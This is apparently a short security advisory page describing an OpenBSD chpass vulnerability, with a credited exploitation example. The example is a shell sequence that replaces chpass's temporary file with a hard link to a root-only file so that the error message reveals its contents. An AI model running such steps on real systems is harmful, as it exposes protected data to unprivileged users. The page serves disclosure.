OpenBSD CHPass Temporary File Link File Content Revealing Vulnerability

The following example of exploitation was made available by Marc Bevand <bevand_m@epita.fr>:

# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
$ chpass # ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg # then quit the editor
chpass
chpass: secret_data: non-standard shell


 

Privacy Statement
Copyright 2010, SecurityFocus